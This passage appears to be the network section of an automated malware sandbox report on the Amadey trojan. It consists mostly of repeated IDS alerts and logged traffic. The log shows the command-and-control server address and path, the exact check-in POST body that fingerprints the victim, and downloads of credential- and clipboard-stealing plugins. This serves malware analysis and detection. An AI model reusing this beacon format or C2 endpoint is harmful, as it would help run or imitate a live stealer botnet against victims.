                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49988 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49989 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49990 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49991 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49992 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49993 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49994 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49995 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49996 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49997 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49998 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49999 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50000 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50001 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50002 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50003 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50004 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50005 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50006 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50007 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50008 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50009 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50010 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50011 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50012 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50013 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50014 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50015 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50016 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50017 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50018 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50019 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50020 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50021 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50022 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50023 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50024 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50025 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50026 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50027 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50028 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50029 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50030 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50031 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50032 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50033 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50034 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50035 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50036 -> 62.204.41.4:80
                          Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50037 -> 62.204.41.4:80
                          Source: Malware configuration extractor URLs: 62.204.41.4/Gol478Ns/index.php
                          Source: global traffic HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.4
                          Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 Host: 62.204.41.4
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                          Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 88Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
